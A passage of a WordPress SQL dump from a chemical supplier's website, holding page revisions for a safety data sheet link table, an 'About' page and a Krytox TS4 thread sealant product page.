<a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf">MS-552N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf">MS-580N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf">MS-582N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/747-16.pdf">MS-747</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2017-02-17 16:28:32', '2017-02-17 16:28:32', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3657, 2, '2017-02-17 16:36:37', '2017-02-17 16:36:37', '[row]\r\n\r\n[col span="5"]\r\n\r\n<strong>On The Cutting Edge of the Performance Chemical Market</strong>\r\n\r\nMiller-Stephenson Chemical Company specializes in providing the most robust, efficient, and highest performing chemical solutions to all industrial sectors.  Our innovative Research and Development team is in constant pursuit of the most technologically advanced materials to better serve our diverse customer base.  Our new product pipeline is highly agile, constantly adjusting to develop solutions to the most stringent performance requirements.  We strive to understand your unique business and engineering requirements and our dedicated technical team helps you find a solution.  If our current portfolio can not solve your issue we hold the technical, material acquisition, and formulation capacity to develop a specialized solution to meet your needs.\r\n\r\n[/col]\r\n\r\n<iframe src="https://www.youtube.com/embed/tbzqYPsuauI" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe>\r\n\r\n[col]\r\n<h3>Miller-Stephenson Chemical Company, founded in 1955.</h3>\r\nLooking back at over 60 years of success, Miller-Stephenson provides superior chemical solutions for a wide range of industries. We are committed to providing customers with industry-leading customer service, delivery and technical support to ensure our customers are successful. We strategically maintain four facilities throughout the United States and Canada to ensure prompt customer service and efficient delivery. Distribution outside North America is handled through authorized distributors. If you have any questions, feel free to contact our Customer Service Department.\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4"]\r\n\r\n[ux_image id="1054"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="142"]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_image id="87"]\r\n\r\n[/col]\r\n\r\n[/row]', 'About', '', 'inherit', 'closed', 'closed', '', '204-revision-v1', '', '', '2017-02-17 16:36:37', '2017-02-17 16:36:37', '', 204, 'https://www.miller-stephenson.com/204-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3658, 2, '2017-02-17 16:44:25', '2017-02-17 16:44:25', '<h1>[share title=""]</h1>\r\n<h1><strong>Krytox TS4 Thread Sealant</strong></h1>\r\n<strong><span style="font-size: 115%;">Sealants and tape often expand under pressure. This requires plants to halt operations for re-application, or worse, address expensive thread damages. Krytox TS4 is a great replacement to avoid constant maintenance. </span></strong>\r\n<p id="custom_1_text_chmsContentCustomTextItem_1_BodyParagraph_1" class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_1" class="chmsParagraph">High quality sealants, like Krytox TS4, prevent leaks and damages that jeopardize operations, even in extreme environments.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_2" class="chmsParagraph">Proper application and a high quality sealant, like Krytox TS4, is the solution for demanding applications, and can help reduce maintenance costs and operational halts.</span></p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly">Thread sealant (TS4) is unlike PTFE tape, which should be removed before re-application. Krytox TS4 can be re-applied over existing Krytox thread sealant. Clings to threads and will not shred or tear on assembly/disassembly. Cannot plug or restrict critical piping, valves, or instruments like tape solids. Krytox TS4 is non-reactive, non-toxic, nonflammable, non-corrosive and compatible with most seal, O-ring, and valve polymers. No VOC content or hydrocarbon in the product; safe for oxygen use with no auto-ignition temperatures. Tested leak free under helium at 400 psi for 7 days.* Safe for use: The Chlorine Institute (Pamphlet 164) rates Krytox lubricants a “1”. Lubricates threads, preventing costly thread damage from galling and seizing during assembly. Allows low breakaway torque for easy-to-break connections.</p>\r\n<p class="chmsContentCustomTextItemBodyParagraph chmsTextOnly"><span id="custom_1_text_chmsParagraph_1_3" class="chmsParagraph">Learn more about Krytox TS4 Thread Sealant, including how to properly apply:</span></p>\r\nhttps://www.youtube.com/watch?v=XxJbQOWtIG0\r\n<h4><strong>Key Benefits of Kytox™ TS4:</strong></h4>\r\n<ul>\r\n 	<li>Can be re-applied over existing Kytox™ thread sealant</li>\r\n 	<li>Clings and will not shred or tear on assembly/disassembly</li>\r\n 	<li>Cannot plug or restrict critical piping, valves or instruments</li>\r\n 	<li>Non-reactive, non-toxic, nonflammable, non-corrosive</li>\r\n 	<li>Compatible with most seal, O-ring and valve polymers</li>\r\n 	<li>No VOC content or hydrocarbon</li>\r\n 	<li>Operating temperature range of –54–149 ºC (–65–300 ºF).</li>\r\n 	<li>Cost-effective- only a small amount of sealant needed</li>\r\n 	<li>Fast and easy to apply</li>\r\n</ul>\r\n<h4><strong>Suggested Krytox TS4 Thread Sealant Application Procedures:</strong></h4>\r\n<ul>\r\n 	<li>Clean all pipe and fitting threads with a non-chlorinated solvent to remove cutting/protective oil and chase threads with stiff wire brush to remove burrs, debris, and old sealant (PTFE tape, pipe dope, anaerobic resin, etc.).</li>\r\n 	<li>Check pipe and fittings against ASNI/ASME guideline B.20.1-1983 to meet specifications for proper fit and engagement.</li>\r\n 	<li>Construct piping systems following all applicable ANSI/ ASME codes.</li>\r\n 	<li>Apply Krytox TS4 to fill the male threads evenly, up to the recommended engagement length from the ANSI/ ASME guideline. DO NOT OVERTIGHTEN.</li>\r\n</ul>\r\n<h4><strong>Recommended Product:</strong></h4>\r\n[ux_product_categories ids="165" number="10"]\r\n\r\n&nbsp;', 'TS4 Thread Sealant', '', 'inherit', 'closed', 'closed', '', '2056-revision-v1', '', '', '2017-02-17 16:44:25', '2017-02-17 16:44:25', '', 2056, 'https://www.miller-stephenson.com/2056-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3659, 0, '2017-02-17 17:00:29', '2017-02-17 17:00:29', '', '', '', 'publish', 'closed', 'closed', '', '3659', '', '', '2017-02-17 17:00:30', '2017-02-17 17:00:30', '', 0, 'https://www.miller-stephenson.com/nf_sub/3659/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3660, 0, '2017-02-17 17:00:36', '2017-02-17 17:00:36', '', '', '', 'publish', 'closed', 'closed', '', '3660', '', '', '2017-02-17 17:00:37', '2017-02-17 17:00:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/3660/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3661, 0, '2017-02-17 18:57:09', '2017-02-17 18:57:09', '', '', '', 'publish', 'closed', 'closed', '', '3661', '', '', '2017-02-17 18:57:09', '2017-02-17 18:57:09', '', 0, 'https://www.miller-stephenson.com/nf_sub/3661/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3662, 0, '2017-02-17 19:44:59', '2017-02-17 19:44:59', '', '', '', 'publish', 'closed', 'closed', '', '3662', '', '', '2017-02-17 19:44:59', '2017-02-17 19:44:59', '', 0, 'https://www.miller-stephenson.com/nf_sub/3662/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3663, 2, '2017-02-17 20:07:54', '2017-02-17 20:07:54', '', '472c-15', '', 'inherit', 'closed', 'closed', '', '472c-15', '', '', '2017-02-17 20:07:54', '2017-02-17 20:07:54', '', 0, 'https://www.miller-stephenson.com/wp-content/uploads/2017/02/472C-15.pdf', 0, 'attachment', 'application/pdf', 0); 
INSERT INTO `wp_posts` VALUES (3664, 2, '2017-02-17 20:08:34', '2017-02-17 20:08:34', '<h1>Miller-Stephenson SDS database.</h1>\r\nIf you are unable to locate the specific SDS you need, please contact our Technical Support at support@mschem.com or 203-743-4447 (8-4 E.T.)\r\n<table width="1119">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="219"><strong>Aerosol</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Liquid</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Release Agents</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Conformal Coatings</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Krytox</strong></td>\r\n<td style="text-align: center;" width="180"><strong>Epoxy</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/124H.pdf">MS-124H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/111.pdf">MS-111</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AD.pdf">MS-122AD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/452N.pdf">MS-452N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AGL683.pdf">AGL 683</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/900.pdf">MS-900</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222L.pdf">MS-222L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/114C.pdf">MS-114C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADRED.pdf">MS-122AD RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/460H.pdf">MS-460H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AT.pdf">AT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905A.pdf">MS-905 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/115.pdf">MS-115</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ADL.pdf">MS-122ADL</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/462H.pdf">MS-462H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/ATA.pdf">ATA</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/905B.pdf">MS-905 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222T</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/182SD.pdf">MS-182SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122AV.pdf">MS-122AV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/465C.pdf">MS-465C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2A45.pdf">AUT 2A45</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907A.pdf">MS-907 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/222N.pdf">MS-222F</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126H.pdf">MS-126H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122E.pdf">MS-122E</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/467C.pdf">MS-467C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT523.pdf">AUT 523</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/907B.pdf">MS-907 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242L.pdf">MS-242L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/126HUV.pdf">MS-126HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122ERED.pdf">MS-122E RED</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470C-16.pdf">MS-470C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT1045.pdf">AUT 1045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908A.pdf">MS-908 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242NAS.pdf">MS-242L-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383A.pdf">MS-383A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SE.pdf">MS-122SE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2017/02/472C-15.pdf">MS-472C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2045.pdf">AUT 2045</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/908B.pdf">MS-908 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242N.pdf">MS-242N</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383H.pdf">MS-383H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122SD.pdf">MS-122SD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/470S-16.pdf">MS-470S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/AUT2245.pdf">AUT 2245</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910A.pdf">MS-910 Part A</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/242NAS.pdf">MS-242N-AS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/383HUV.pdf">MS-383HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/122XD.pdf">MS-122XD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/472S.pdf">MS-472S</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143.pdf">143 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/910B.pdf">MS-910 Part B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381H.pdf">MS-381H</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/252.pdf">MS-252</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/132FE.pdf">MS-132FE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/475C.pdf">MS-475C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL10X.pdf">GPL 10X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy48.pdf">HELOXY 48</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381H.pdf">MS-381HM</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/257.pdf">MS-257</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/136W.pdf">MS-136W</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/477C.pdf">MS-477C</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL246.pdf">GPL 246</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy61.pdf">HELOXY 61</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HUV.pdf">MS-381HUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/262.pdf">MS-262</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143AX.pdf">MS-143AX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/G0831B.pdf">G0831B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL255.pdf">GPL 255</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy62.pdf">HELOXY 62</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HUV.pdf">MS-381HMUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/282.pdf">MS-282</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143E-16.pdf">MS-143E</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Y0110A.pdf">Y0110A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/157FS.pdf">157FS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy67.pdf">HELOXY 67</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HC.pdf">MS-381HC</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/532.pdf">MS-532</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E1.pdf">MS-143E-1</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/487G-16.pdf">MS-487G</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL20X.pdf">GPL 20X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy68.pdf">HELOXY 68</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HC.pdf">MS-381HCM</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/539.pdf">MS-539</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E2.pdf">MS-143E-2</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL21X.pdf">GPL 21X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy71.pdf">HELOXY 71</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HCUV.pdf">MS-381HCUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/552.pdf">MS-552</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E5.pdf">MS-143E-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL22X.pdf">GPL 22X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy107.pdf">HELOXY 107</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/381HCUV.pdf">MS-381HCMUV</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/557.pdf">MS-557</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143E10.pdf">MS-143E-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL226FG227FG.pdf">GPL 226FG, 227FG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy116.pdf">HELOXY 116</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/250.pdf">MS-250</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/562.pdf">MS-562</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143EBLUE.pdf">MS-143E BLUE</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/240.pdf">240 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/heloxy505.pdf">HELOXY 505</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/250.pdf">MS-250M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/582.pdf">MS-582</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143ERED.pdf">MS-143E RED</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/250-Series.pdf">250 Series</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BisphenolA157.pdf">BISPHENOL A-157</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/250.pdf">MS-250SP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/702.pdf">MS-702</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143H-16.pdf">MS-143H</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/280-15.pdf">280 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/164.pdf">EPON RESIN 164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/255.pdf">MS-255</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/722.pdf">MS-722</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143H1.pdf">MS-143H-1</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/283.pdf">283 SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/SU8.pdf">EPON RESIN SU 8</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/255.pdf">MS-255M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/727.pdf">MS-727</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143H25.pdf">MS-143H-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL29X.pdf">GPL 29X SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/813.pdf">EPON RESIN 813</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/260.pdf">MS-260</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/732.pdf">MS-732</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143H5.pdf">MS-143H-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL407.pdf">GPL 407</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/815C.pdf">EPON RESIN 815C</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/260.pdf">MS-260M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/739.pdf">MS-739</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143H10.pdf">MS-143H-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/EG20003000.pdf">EG 2000, 3000</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/825.pdf">EPON RESIN 825</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/280.pdf">MS-280</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/747.pdf">MS-747</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143HBLUE.pdf">MS-143H BLUE</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/FPG.pdf">FPG SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/826.pdf">EPON RESIN 826</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/530.pdf">MS-530</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/752.pdf">MS-752</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143HRED.pdf">MS-143H RED</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Lineargrease.pdf">LINEAR GREASE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/828.pdf">EPON RESIN 828</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/538.pdf">MS-538</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/752U.pdf">MS-752U</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143TE.pdf">MS-143 